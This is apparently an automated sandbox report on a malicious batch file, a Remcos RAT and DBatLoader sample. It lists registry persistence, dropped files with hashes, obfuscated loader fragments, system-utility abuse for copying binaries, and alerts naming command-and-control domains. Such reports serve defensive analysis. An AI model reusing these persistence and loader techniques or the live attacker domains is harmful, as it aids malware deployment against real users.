Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1565803
Start date and time:	2024-11-30 21:19:04 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 3s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	34
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	saw.bat
Detection:	MAL
Classification:	mal100.rans.bank.troj.spyw.expl.evad.winBAT@55/22@240/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 60 Number of non-executed functions: 206
Cookbook Comments:	Found application associated with file extension: .bat Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: saw.bat

Simulations

Behavior and APIs

Time	Type	Description
15:19:57	API Interceptor	2x Sleep call for process: AnyDesk.PIF modified
15:20:23	API Interceptor	2x Sleep call for process: Puyiaiob.PIF modified
15:20:46	API Interceptor	2633720x Sleep call for process: colorcpl.exe modified
20:19:46	Task Scheduler	Run new task: {FAE0C93B-B610-4BA1-AE2E-352962E6DB7A} path:
20:20:15	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Puyiaiob C:\Users\Public\Puyiaiob.url
20:20:23	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Puyiaiob C:\Users\Public\Puyiaiob.url

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
myumysmeetr.ddns.net	yak.exe	Get hash	malicious	Remcos, DBatLoader	Browse	89.117.145.5

ASNs

⊘No context

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse	172.217.19.238 142.250.181.33
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.217.19.238 142.250.181.33
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.217.19.238 142.250.181.33
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.217.19.238 142.250.181.33
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.217.19.238 142.250.181.33
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.217.19.238 142.250.181.33
	x.exe	Get hash	malicious	DBatLoader	Browse	172.217.19.238 142.250.181.33
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.217.19.238 142.250.181.33
	mmF9ZzglIn.vbs	Get hash	malicious	Unknown	Browse	172.217.19.238 142.250.181.33
	file.exe	Get hash	malicious	Amadey, Cryptbot, LummaC Stealer, Nymaim, Stealc	Browse	172.217.19.238 142.250.181.33

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\Public\alpha.exe	A1 igazol#U00e1s.cmd	Get hash	malicious	DBatLoader, FormBook	Browse
	Documentazione_Doganale_richieste_di_copia.cmd	Get hash	malicious	DBatLoader	Browse
	78326473_PDF.cmd	Get hash	malicious	DBatLoader	Browse
	iuhmzvlH.cmd	Get hash	malicious	Unknown	Browse
	USD470900_COPY_800BLHSBC882001.PDF.bat	Get hash	malicious	Remcos, DBatLoader	Browse
	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse
	#U00c1raj#U00e1nlat k#U00e9r#U00e9s 12#U00b711#U00b72024#U00b7Pdf.cmd	Get hash	malicious	Unknown	Browse
	#U00c1raj#U00e1nlat k#U00e9r#U00e9s 06.11.2024.cmd	Get hash	malicious	DBatLoader, FormBook	Browse
	TZH3Uk8x45.bat	Get hash	malicious	DBatLoader, PureLog Stealer, XWorm	Browse

Created / dropped Files

C:\ProgramData\ANYDESKS\logs.dat

Download File

Process:	C:\Windows\SysWOW64\colorcpl.exe
File Type:	data
Category:	dropped
Size (bytes):	356
Entropy (8bit):	3.2841478843310083
Encrypted:	false
SSDEEP:	6:6lfglQtC5YcIeeDAlIfE/OS/1gWA41gWAGfE/OSFWAv:6l4lQtCecB/OSqWIWa/OSFW+
MD5:	ADBDC66395B0A3344B8F95620A4D8E12
SHA1:	794664AF61F00AD2855D661964F8DCD9F281C67C
SHA-256:	C0E1C82FC0A8A9B147CFA56BF74482834B03883759CC0C378719D02A8FE0CB3E
SHA-512:	C6DC4FCE1804662615493A6FC3BFF2233982329013E8D087923E23578F096DD42DB1416F9102D1C8138C2D19BFB8BCB7D323ABA7685EBCCFC394AA6F658C78EE
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\ANYDESKS\logs.dat, Author: Joe Security
Preview:	....[.2.0.2.4./.1.1./.3.0. .1.5.:.2.0.:.1.1. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.C.o.l.o.u.r. .M.a.n.a.g.e.m.e.n.t.].........[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........[.C.o.l.o.u.r. .M.a.n.a.g.e.m.e.n.t.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

C:\Users\Public\AnyDesk.jpeg

Download File

Process:	C:\Users\Public\kn.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	2117634
Entropy (8bit):	3.866920803629215
Encrypted:	false
SSDEEP:	24576:ZzNbICEKK8QduVo61G7ZT/HAnA1PMOf4hB63BF4Uc5U5:O
MD5:	327EE6DCF81E0C79B5F0D98FA9827D97
SHA1:	6855C1D0A5A78B282791317325B63D1AB386180D
SHA-256:	976D7BABCDE75ECB4D9B07F3FB406AB28B61C82B4B5ED3D0B73418AC76F56464
SHA-512:	3896603182283921A240C50ED60D9FAE0AECADE0536D6D0562759AB5653536576401569A270AE8F8A91F22C01F0E972D3EBBA3B09EA44B8B41175A9217F18B77
Malicious:	false
Preview:	4d5a50000200000004000f00ffff0000b80000000000000040001a00000000000000000000000000000000000000000000000000000000000000000000010000ba10000e1fb409cd21b8014ccd219090546869732070726f6772616d206d7573742062652072756e20756e6465722057696e33320d0a243700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000504500004c010900195e422a0000000000000000e0008e810b01021900ce050000560a00000000005ce705000010000000f005000000400000100000000200000400000000000000040000000000000000c01000000400000000000002000000000010000040000000001000001000000000000010000000000000000000000000500600de2600000010070000a609000000000000000000000000000000000000a0060084670000000000000000000000000000000000000000000000000000009006001800000000000000000000000000000000000000245706000c0600000000000000000000000000000000000000000000

C:\Users\Public\Libraries\AnyDesk.PIF

Download File

Process:	C:\Users\Public\kn.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1058816
Entropy (8bit):	6.943911720958145
Encrypted:	false
SSDEEP:	12288:uYpg9YBvkXS4+lSFSZtY09Rzviu3E3Xxb5upgNcyAq9cfeWybiZFIO37Lftiid:TCYkXV+ldZtDRDiuqx1SeWybiZFIOn
MD5:	35811E8D8969BEF5354C7C3E6DBEFB27
SHA1:	E4696F8AF5A54511E89B0153A443C891FFD56511
SHA-256:	93674E207F913C1E8FA39A6E75807C6865C73FEEE39E38E7A9747003C8BD22B1
SHA-512:	61D0E4BE16D68775C5B73B52E976FB64D10A6A16A5DDF94312C26947268B378FD04F19242A5D9D281E4F30FCEC9DEF9E60C15819B9428C0660ECC99C067910F0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 24%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................V......\.............@..............................................@...........................P...&...............................g..................................................$W...............................text............................... ..`.itext.............................. ..`.data...............................@....bss.....6...............................idata...&...P...(..................@....tls....4................................rdata..............................@..@.reloc...g.......h..................@..B.rsrc...............................@..@.....................(..............@..@................................................................................................

C:\Users\Public\Libraries\PNO

Download File

Process:	C:\Users\Public\Libraries\AnyDesk.PIF
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4
Entropy (8bit):	2.0
Encrypted:	false
SSDEEP:	3:4vn:4vn
MD5:	8E009CFB003A8AFBA9005F58C4D033BA
SHA1:	923E7B28DABEA546EC8EC90648174DDD9058219F
SHA-256:	814DD6946834238CC05A48FF3F894AB16E2FBB56BBE4FBF386D046537E172226
SHA-512:	2B14C4B715B0A816B63F2D825AD968355837F1E3BFAC492399DEC5E4D9F9F11EB6AD88FC3505FB5CAFFBFE2612E2B512FAF3ADAF50173458AB77B0314E1CA525
Malicious:	false
Preview:	80..

C:\Users\Public\Libraries\Puyiaiob

Download File

Process:	C:\Users\Public\Libraries\AnyDesk.PIF
File Type:	data
Category:	dropped
Size (bytes):	804168
Entropy (8bit):	7.399879000521788
Encrypted:	false
SSDEEP:	12288:GI/ZPjxgVWMGLneZf5i0kQb6GyFRAGnNJE2U7yJHxNnrpEGOFz9cWVAfGWYHW8:5lGl7ZfY0tbJyFyGNJE2UoIFBe+Z
MD5:	C0F5F6F2ADB80042FB5FE6F88B29D7E9
SHA1:	7CB31A5A6D401BBA9AFB211B0C7A580DE6903465
SHA-256:	5CF2DF1160CA4357BF87327038C2DD7F01A19DFFAE217C6B4D4E72D4545FCEAA
SHA-512:	CC40C42B2B26815D840838CC47611E6CC506B4C2B6B66EB926FDB62E5836A189A370C14997827C8AA94352FC6F0A31E903341C2A3E48EDBD6E78007DF821C8F5
Malicious:	true
Preview:	...Y#..K!'....#$....%...$....#...#......$%.......'.&%.#......$.&%...".'".!....%...!.%"..".....%....Y#..K."&.....&.....Y#..K................................................................................................................................................................................................................................................................................................................................................................................................................. ......................2"..>...-$..I..........................................................................................................................................................................................................................................................................................................................

C:\Users\Public\Libraries\Puyiaiob.PIF

Download File

Process:	C:\Windows\SysWOW64\esentutl.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1058816
Entropy (8bit):	6.943911720958145
Encrypted:	false
SSDEEP:	12288:uYpg9YBvkXS4+lSFSZtY09Rzviu3E3Xxb5upgNcyAq9cfeWybiZFIO37Lftiid:TCYkXV+ldZtDRDiuqx1SeWybiZFIOn
MD5:	35811E8D8969BEF5354C7C3E6DBEFB27
SHA1:	E4696F8AF5A54511E89B0153A443C891FFD56511
SHA-256:	93674E207F913C1E8FA39A6E75807C6865C73FEEE39E38E7A9747003C8BD22B1
SHA-512:	61D0E4BE16D68775C5B73B52E976FB64D10A6A16A5DDF94312C26947268B378FD04F19242A5D9D281E4F30FCEC9DEF9E60C15819B9428C0660ECC99C067910F0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 24%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................V......\.............@..............................................@...........................P...&...............................g..................................................$W...............................text............................... ..`.itext.............................. ..`.data...............................@....bss.....6...............................idata...&...P...(..................@....tls....4................................rdata..............................@..@.reloc...g.......h..................@..B.rsrc...............................@..@.....................(..............@..@................................................................................................

C:\Users\Public\Libraries\boiaiyuP.cmd

Download File

Process:	C:\Users\Public\Libraries\AnyDesk.PIF
File Type:	DOS batch file, Unicode text, UTF-8 text, with very long lines (324), with CRLF line terminators
Category:	dropped
Size (bytes):	62357
Entropy (8bit):	4.705712327109906
Encrypted:	false
SSDEEP:	768:KwVRHlxGSbE0l9swi54HlMhhAKHwT6yQZPtQdtyWNd/Ozc:LbeSI0l9swahhhtwT6VytHNdGzc
MD5:	B87F096CBC25570329E2BB59FEE57580
SHA1:	D281D1BF37B4FB46F90973AFC65EECE3908532B2
SHA-256:	D08CCC9B1E3ACC205FE754BAD8416964E9711815E9CEED5E6AF73D8E9035EC9E
SHA-512:	72901ADDE38F50CF6D74743C0A546C0FEA8B1CD4A18449048A0758A7593A176FC33AAD1EBFD955775EEFC2B30532BCC18E4F2964B3731B668DD87D94405951F7
Malicious:	false
Preview:	@echo off..@echo off..@%.......%e%..%c%...%h%.... ...%o%........% %.%o%.....%f%...%f% ........%..s%.%e%.... %t%r.o......% %....%"%.........%l%.......o.%V%......%W%.....o%a%..........%=%.o....%s%. .o%e%. ....... %t%.% %..%"%.r%..%lVWa%"%......%u%. .%p%.%w%.... %u%.... o...%=%..... %=%... . . %"%.%..%lVWa%"%....%R%.%b%. .... %U%. %p%.%z%...%n% ...%n%...%f%..... . ..%W%.......%i%......%%upwu%C%. .. %l%...%o%........%a%......%"% .... %..%lVWa%"% %r%......%M%....%S%...r... ..%o%....... .%w%.....%X%.....rr%I%..... .

C:\Users\Public\Puyiaiob.url

Download File

Process:	C:\Users\Public\Libraries\AnyDesk.PIF
File Type:	MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Puyiaiob.PIF">), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	104
Entropy (8bit):	5.095537166020087
Encrypted:	false
SSDEEP:	3:HRAbABGQYmTWAX+rSF55i0XMgSLm7ysbxmVyfAv:HRYFVmTWDyzWTExEbv
MD5:	E7E7617D0DA40103060BCA0F81563966
SHA1:	E5DCD18073AB5CE5D28343151FF6E984B4242191
SHA-256:	C2F3FABCB08FAAA5EE494F097B3104637AF11E87366923590EF62FD878CF6E42
SHA-512:	E7BF9BA409C6BC7685D79D14E0D604656AD82239F4C63F138AA64304F05E70E004B050F840431F576FBD52B67E40D7898EE71302E2A246953DE115F2CA4B92B4
Malicious:	true
Preview:	[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Puyiaiob.PIF"..IconIndex=908337..HotKey=54..

C:\Users\Public\alpha.exe

Download File

Process:	C:\Windows\System32\extrac32.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	modified
Size (bytes):	289792
Entropy (8bit):	6.135598950357573
Encrypted:	false
SSDEEP:	6144:k4WA1B9BxDfQWKORSqY4zOcmpdlc3gJdmtolSm:H1BhkWvSqY4zvmjOwJIT
MD5:	8A2122E8162DBEF04694B9C3E0B6CDEE
SHA1:	F1EFB0FDDC156E4C61C5F78A54700E4E7984D55D
SHA-256:	B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450
SHA-512:	99E784141193275D4364BA1B8762B07CC150CA3CB7E9AA1D4386BA1FA87E073D0500E61572F8D1B071F2FAA2A51BB123E12D9D07054B59A1A2FD768AD9F24397
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: A1 igazol#U00e1s.cmd, Detection: malicious, Browse Filename: Documentazione_Doganale_richieste_di_copia.cmd, Detection: malicious, Browse Filename: 78326473_PDF.cmd, Detection: malicious, Browse Filename: iuhmzvlH.cmd, Detection: malicious, Browse Filename: USD470900_COPY_800BLHSBC882001.PDF.bat, Detection: malicious, Browse Filename: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd, Detection: malicious, Browse Filename: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd, Detection: malicious, Browse Filename: #U00c1raj#U00e1nlat k#U00e9r#U00e9s 12#U00b711#U00b72024#U00b7Pdf.cmd, Detection: malicious, Browse Filename: #U00c1raj#U00e1nlat k#U00e9r#U00e9s 06.11.2024.cmd, Detection: malicious, Browse Filename: TZH3Uk8x45.bat, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........OH...&...&...&..V...&..E%...&..E"...&...'../&..E'...&..E#...&..E+...&..E....&..E$...&.Rich..&.................PE..d...S.............".................P..........@.............................p............`.................................................(...................4#...........`......`Z..T............................,...............4...... ........................text............................... ..`.rdata..<.... ......................@..@.data...P...........................@....pdata..4#.......$..................@..@.didat..............................@....rsrc...............................@..@.reloc.......`.......h..............@..B........................................................................................................................................................................................................................

C:\Users\Public\alpha.pif

Download File

Process:	C:\Windows\SysWOW64\esentutl.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	236544
Entropy (8bit):	6.4416694948877025
Encrypted:	false
SSDEEP:	6144:i4VU52dn+OAdUV0RzCcXkThYrK9qqUtmtime:i4K2B+Ob2h0NXIn
MD5:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
SHA1:	4048488DE6BA4BFEF9EDF103755519F1F762668F
SHA-256:	4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22
SHA-512:	80E127EF81752CD50F9EA2D662DC4D3BF8DB8D29680E75FA5FC406CA22CAFA5C4D89EF2EAC65B486413D3CDD57A2C12A1CB75F65D1E312A717D262265736D1C2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+.l.J.?.J.?.J.?.2(?.J.?.!.>.J.?.!.>.J.?.J.?.K.?.!.>.J.?.!.>.J.?.!.>.J.?.!D?.J.?.!.>.J.?Rich.J.?................PE..L....~.............................. k............@..................................j....@.................................................................p...%...5..T............................................................................text............................... ..`.data...8...........................@....idata...$.......&..................@..@.didat..H...........................@....rsrc...............................@..@.reloc...%...p...&...v..............@..B................................................................................................................................................................................................................................................................................

C:\Users\Public\kn.exe

Download File

Process:	C:\Windows\System32\extrac32.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	modified
Size (bytes):	1651712
Entropy (8bit):	6.144018815244304
Encrypted:	false
SSDEEP:	24576:MeiElH5YZ5cv6r3HiaZQ8p4XGwiJDgN7MaikGLIsWWi4pT/Y/7hsyDAP760MKR:Me3lZYUvmSu4XTckYD0sWWiwT/MhTzK
MD5:	F17616EC0522FC5633151F7CAA278CAA
SHA1:	79890525360928A674D6AEF11F4EDE31143EEC0D
SHA-256:	D252235AA420B91C38BFEEC4F1C3F3434BC853D04635453648B26B2947352889
SHA-512:	3ED65172159CD1BCC96B5A0B41D3332DE33A631A167CE8EE8FC43F519BB3E2383A58737A41D25AA694513A68C639F0563A395CD18063975136DE1988094E9EF7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u}{h1..;1..;1..;..;0..;%w.:2..;%w.:*..;%w.:!..;%w.:...;1..;...;%w.:...;%w.;0..;%w.:0..;Rich1..;................PE..d...+. H.........."..................L.........@....................................q.....`.......... ......................................@Q.......`..@........x..............l'..p5..T...........................`(..............x)......XC.......................text............................... ..`.rdata..T...........................@..@.data....&..........................@....pdata...x.......z...\|..............@..@.didat.......P......................@....rsrc...@....`......................@..@.reloc..l'.......(..................@..B........................................................................................................................................................................................................................

C:\Users\Public\xpha.pif

Download File

Process:	C:\Windows\SysWOW64\esentutl.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18944
Entropy (8bit):	5.742964649637377
Encrypted:	false
SSDEEP:	384:PVhNH/TqNcx+5tTAjtn3bPcPwoeGULZbiWBlWjVw:PVhZXx+5tTetLVohULZJgw
MD5:	B3624DD758CCECF93A1226CEF252CA12
SHA1:	FCF4DAD8C4AD101504B1BF47CBBDDBAC36B558A7
SHA-256:	4AAA74F294C15AEB37ADA8185D0DEAD58BD87276A01A814ABC0C4B40545BF2EF
SHA-512:	C613D18511B00FA25FC7B1BDDE10D96DEBB42A99B5AAAB9E9826538D0E229085BB371F0197F6B1086C4F9C605F01E71287FFC5442F701A95D67C232A5F031838
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.[...5]..5]..5]..]'.5]..0\..5]..6\..5]..1\..5]..4]Q.5]..4\..5]..=\..5]...]..5]..7\..5]Rich..5]................PE..L....$Z.....................2......P4.......@....@..................................c....@...... ..........................`a..\|....p.. ...............................T............................................`..\............................text....)......................... ..`.data........@......................@....idata.......`.......0..............@..@.rsrc... ....p.......<..............@..@.reloc...............F..............@..B........................................................................................................................................................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\Windows\SysWOW64\esentutl.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	589
Entropy (8bit):	4.610621343441669
Encrypted:	false
SSDEEP:	12:qzBBVmXxTzWReSbZ7u0wxDDDDDDDDjCaY58laYAfCMlTB8NGNJ:iBB0XxTzWRp7u0wQak8lapTt8Nc
MD5:	6CFE4039B2E75C5E41B68FB72DFAD3E7
SHA1:	3520ED082E19B5C9E9F6DFB8AB2965C544E50E0B
SHA-256:	B8C992C22A69FE49714BB9178B3AFB324EC5C9FF2F7EFDD84C07DC7D7443AEFC
SHA-512:	44B035C5E65CBDB8C809909FA38EA5EB5A9E29532651721DD7F3C24E32E8EC82D9CB2CB1A8B27E68531E74D605C5E95B7407B276272EC00317C93415AA3D7B99
Malicious:	false
Preview:	..Initiating COPY FILE mode..... Source File: C:\Users\Public\Libraries\AnyDesk.PIF...Destination File: C:\\Users\\Public\\Libraries\\Puyiaiob.PIF...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... \|----\|----\|----\|----\|----\|----\|----\|----\|----\|----\|... ..........................................................Total bytes read = 0x102800 (1058816) (1 MB)....Total bytes written = 0x103000 (1060864) (1 MB).......Operation completed successfully in 0.94 seconds.....

\Device\Null

Download File

Process:	C:\Windows\SysWOW64\esentutl.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	560
Entropy (8bit):	4.532578488470501
Encrypted:	false
SSDEEP:	12:q6p4xTXWIceSbZ7u0wxDDDDDDDDjCaY5B4aYA/4TB8NGNBG:/p4xT5cp7u0wQakB4aV4t8Nd
MD5:	4D6C195EBA3736E57EF6A03F1EEEF490
SHA1:	237210C613550627B46D6D6AB82F396EACA3EA20
SHA-256:	FF89C20795C881958044CCE205E8EBAE0CC028631ED1E354BEF0AF0C5BD23E3C
SHA-512:	2E4AC9CDB61DDEFDDEE6378C39282BABFCC457BB896D1B92E07E234BC202D0677FC20BD96FD0102A32B211DB5D47DDB1C8C0A396A481C9696E7CF0DF4959D3A1
Malicious:	false
Preview:	..Initiating COPY FILE mode..... Source File: C:\\Windows\\System32\\ping.exe...Destination File: C:\\Users\\Public\\xpha.pif...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... \|----\|----\|----\|----\|----\|----\|----\|----\|----\|----\|... ..........................................................Total bytes read = 0x4a00 (18944) (0 MB)....Total bytes written = 0x5000 (20480) (0 MB).......Operation completed successfully in 0.62 seconds.....

Static File Info

General

File type:	Unicode text, UTF-8 text, with very long lines (468), with CRLF line terminators
Entropy (8bit):	4.965948591559571
TrID:
File name:	saw.bat
File size:	2'921'546 bytes
MD5:	0be98dc322d842f3f9952ca41c2fe012
SHA1:	a0d32141b0c3bb39ce4f4e6a8d4fb0699341d4e3
SHA256:	a1a77d48d276da51e97ce070b0d4c08c6f2900e8a2d4c15ce0adb4cff27c2669
SHA512:	87b4c7bea4e405b9c7f272c4873f648c8ce7ca43543f66e2996b333a2695b90c689d5e31329198a3be8aeea519f39db99408274821bb7066fedb94606ad83b8f
SSDEEP:	24576:FYfNclHFdqSgaRDQMErAfBEHuMEIZVx+RCNJXCP+G1dT+pnmSqocVHrO5I8CZ:FqNclHbqS710rAf+uME6AP7xCA
TLSH:	1CD55FF738AF17475705639BA78BE96427ABC83747C27EC4C0CAD688400A6DF1960E5E
File Content Preview:	PIFPIF@%..%e%.. .. .. ..%c%..%h%........ ........ %o% ..........% %......%o%.......... %f% %f%....%..s%..................... r%e%...%t%.................. ...% %............%"%............%H%... %R%....... ...%T%.......%w%.........o......%=% ......... ....

File Icon


Icon Hash:	9686878b929a9886

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-30T21:20:00.748532+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49731	172.217.19.238	443	TCP
2024-11-30T21:20:03.715665+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49732	142.250.181.33	443	TCP
2024-11-30T21:20:14.165777+0100	2052852	ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)	1	192.168.2.4	58194	1.1.1.1	53	UDP
2024-11-30T21:20:14.399771+0100	2052851	ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)	1	192.168.2.4	59343	1.1.1.1	53	UDP
2024-11-30T21:20:14.729773+0100	2052853	ET MALWARE DNS Query to Remcos Related Domain (myumysmeetr .ddns .net)	1	192.168.2.4	58098	1.1.1.1	53	UDP
2024-11-30T21:20:14.960142+0100	2052849	ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)	1	192.168.2.4	62093	1.1.1.1	53	UDP
2024-11-30T21:20:19.664894+0100	2052852	ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)	1	192.168.2.4	51083	1.1.1.1	53	UDP
2024-11-30T21:20:19.811277+0100	2052851	ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)	1	192.168.2.4	53547	1.1.1.1	53	UDP
2024-11-30T21:20:19.953778+0100	2052849	ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)	1	192.168.2.4	61155	1.1.1.1	53	UDP
2024-11-30T21:20:24.496412+0100	2052852	ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)	1	192.168.2.4	61257	1.1.1.1	53	UDP
2024-11-30T21:20:24.638699+0100	2052851	ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)	1	192.168.2.4	65126	1.1.1.1	53	UDP
2024-11-30T21:20:25.968305+0100	2052849	ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)	1	192.168.2.4	51046	1.1.1.1	53	UDP
2024-11-30T21:20:29.206114+0100	2052852	ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)	1	192.168.2.4	57310	1.1.1.1	53	UDP
2024-11-30T21:20:29.344915+0100	2052851	ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)	1	192.168.2.4	50667	1.1.1.1	53	UDP
2024-11-30T21:20:31.508606+0100	2052849	ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)	1	192.168.2.4	58377	1.1.1.1	53	UDP
2024-11-30T21:20:35.031611+0100	2052852	ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)	1	192.168.2.4	50236	1.1.1.1	53	UDP
2024-11-30T21:20:35.170342+0100	2052851	ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)	1	192.168.2.4	56437	1.1.1.1	53	UDP
2024-11-30T21:20:36.414866+0100	2052849	ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)	1	192.168.2.4	52231	1.1.1.1	53	UDP
2024-11-30T21:20:40.879401+0100	2052852	ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)	1	192.168.2.4	49844	1.1.1.1	53	UDP
2024-11-30T21:20:41.037495+0100	2052851	ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)	1	192.168.2.4	60974	1.1.1.1	53	UDP
2024-11-30T21:20:41.207197+0100	2052849	ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)	1	192.168.2.4	54616	1.1.1.1	53	UDP
2024-11-30T21:20:46.690949+0100	2052852	ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)	1	192.168.2.4	57490	1.1.1.1	53	UDP
2024-11-30T21:20:46.866140+0100	2052851	ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)	1	192.168.2.4	60471	1.1.1.1	53	UDP
2024-11-30T21:20:47.011625+0100	2052849	ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)	1	192.168.2.4	52810	1.1.1.1	53	UDP
2024-11-30T21:20:51.472702+0100	2052852	ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)	1	192.168.2.4	58067	1.1.1.1	53	UDP
